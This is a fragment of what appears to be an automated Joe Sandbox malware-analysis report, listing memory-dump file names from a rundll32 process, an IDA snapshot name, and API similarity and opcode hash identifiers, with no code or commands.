                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728081580.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728113563.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728303912.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_69340000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 682475483-0
                                                                                                                                                                                                                • Opcode ID: 8852aac37c6fd83e67a81a8a7705b6a0a19c3db9ddd8cb4d70b2c930beee8ff0
                                                                                                                                                                                                                • Instruction ID: 455d058e190500b25c4036b5ce58305cdaa5a743c53bd03fa708557c2ea23cbd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8852aac37c6fd83e67a81a8a7705b6a0a19c3db9ddd8cb4d70b2c930beee8ff0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90F0A4B69043408BDF20BFB9D7C651A7BB8FA46700B050529DD944B204DA75A406CBA3
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%